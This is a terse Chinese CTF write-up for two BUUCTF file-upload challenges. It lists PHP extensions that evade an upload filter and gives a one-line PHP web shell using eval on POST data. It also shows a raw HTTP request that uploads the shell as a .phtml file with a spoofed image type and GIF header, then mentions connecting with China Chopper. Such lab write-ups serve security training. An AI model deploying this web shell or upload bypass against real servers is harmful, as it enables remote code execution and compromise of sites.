[极客大挑战 2019]Upload/[ACTF2020 新生赛]Upload
格式绕过
php,php3,php4,php5,phtml,pht
1
| <script language='php'>phpinfo();eval($_POST['v']);</script>
|
Content-Type: image/png
POST /upload\_file.php HTTP/1.1
Host: 19b6558c-a515-415e-a219-3c3175b62eed.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------2861896706387660493773565516
Content-Length: 399
Origin: http://19b6558c-a515-415e-a219-3c3175b62eed.node3.buuoj.cn
Connection: close
Referer: http://19b6558c-a515-415e-a219-3c3175b62eed.node3.buuoj.cn/
Upgrade-Insecure-Requests: 1
-----------------------------2861896706387660493773565516
Content-Disposition: form-data; name="file"; filename="1.phtml"
Content-Type: image/png
GIF98a?
-----------------------------2861896706387660493773565516
Content-Disposition: form-data; name="submit"
提交
-----------------------------2861896706387660493773565516--
然后用菜刀就可以了
